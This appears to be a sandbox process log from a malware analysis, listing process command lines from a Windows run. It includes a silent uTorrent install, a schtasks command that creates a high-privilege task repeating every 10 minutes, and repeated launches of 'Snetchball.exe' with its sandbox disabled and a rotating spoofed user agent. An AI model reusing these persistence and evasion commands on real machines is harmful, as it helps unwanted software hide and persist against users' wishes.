"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe" /S

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /delete /tn "MyUTorrentTask" /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn "MyUTorrentTask" /tr "C:\Users\Admin\AppData\Roaming\utorrent\pro\uTorrentPro.exe /LHS" /sc minute /mo 10 /st 04:01 /du 02:00 /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2992 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4088 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2772 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3048 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3052 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4224 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1084

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3220 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4276 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2896 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2932 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

